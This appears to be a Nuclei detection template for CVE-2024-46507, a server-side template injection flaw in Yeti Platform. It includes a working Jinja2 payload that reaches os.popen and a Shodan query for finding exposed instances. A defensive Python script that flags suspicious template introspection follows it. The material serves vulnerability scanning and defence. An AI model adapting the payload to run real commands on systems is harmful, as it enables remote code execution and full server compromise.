Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE

ID: CVE-2024-46507

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,yeti,platform,ssti,rce,intrusive

The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.

id: CVE-2024-46507

info:
  name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
  impact: |
    Successful exploitation enables an attacker to execute arbitrary system commands, potentially leading to full server compromise.
  remediation: |
    Upgrade to Yeti Platform 2.1.12 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/
  metadata:
    shodan-query: html:"Yeti</title>"
    verified: true
    max-request: 4
  tags: cve,cve2024,yeti,platform,ssti,rce,intrusive

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v2/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n

        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n--

    matchers:
      - type: word
        part: body
        words:
          - access_token
        internal: true

  - raw:
      - |
        POST /api/v2/templates/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template":{"name":"AA","template":"value,tags\n{% for obj in data %}{{obj.value}},{{\";\".join(obj.tags.keys())}}\n{% endfor %}\n\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"echo Q1ZFLTIwMjQtNDY1MDcK | base64 -d\").read()}}{%endif%}{% endfor %}"}}

    skip-variables-check: true
    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.id'
        internal: true

  - raw:
      - |
        POST /api/v2/observables/extended HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"observable":{"type":"ipv4","value":"1.{{randint(1,255)}}.{{randint(1,255)}}.{{randint(1,255)}}"}}

    extractors:
      - type: json
        part: body
        name: observable_id
        json:
          - '.id'
        internal: true

  - raw:
      - |
        POST /api/v2/templates/render HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template_id":"{{template_id}}","observable_ids":["{{observable_id}}"],"search_query":""}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "CVE-2024-46507")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100a9f6674b61d9e5ee7a6d82dcb3aabc14f4dc563c151f4147724087fb9bb96c42022100ed237c22d59d36ca5aae7d6bc286135d5045ec53118c3bd8953ff996e599dba5:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46507.yaml"
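
For defenders reviewing templates already stored in an instance, the following added example (not part of the Nuclei template or of Yeti's code) flags Python introspection names used inside `{{ }}` and `{% %}` blocks, which is the pattern the template body in this check relies on. The function names and the `SAMPLES` dictionary are constructed for illustration, and the name-to-body export format is an assumption.

```python
import re

# Jinja2-style expression ({{ ... }}) and statement ({% ... %}) blocks.
BLOCK_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)
# Double-underscore names, whether reached by attribute access or subscript.
DUNDER_RE = re.compile(r"__[A-Za-z][A-Za-z0-9_]*?__")


def find_introspection(template_source):
    """Return the sorted dunder names used inside template blocks.

    Text outside {{ }} / {% %} is literal output and is ignored, so a
    column that merely contains "__init__" is not reported.
    """
    hits = set()
    for match in BLOCK_RE.finditer(template_source):
        block = match.group(1) if match.group(1) is not None else match.group(2)
        hits.update(DUNDER_RE.findall(block))
    return sorted(hits)


def audit(templates):
    """Map template name -> dunder names, for templates with at least one hit."""
    report = {}
    for name, source in templates.items():
        hits = find_introspection(source)
        if hits:
            report[name] = hits
    return report


# Constructed sample templates (assumed export format: name -> template body).
SAMPLES = {
    "csv_export": 'value,tags\n{% for obj in data %}{{obj.value}},'
                  '{{";".join(obj.tags.keys())}}\n{% endfor %}',
    "literal_text": "Column __init__ is plain output\n{{ obj.value }}",
    "introspect": "{% for x in ().__class__.__base__.__subclasses__() %}"
                  "{{ x.__name__ }}{% endfor %}",
}

if __name__ == "__main__":
    for name, hits in audit(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

A hit is a prompt to review the template and who created it, not proof of compromise; the remediation remains upgrading to Yeti Platform 2.1.12 or later.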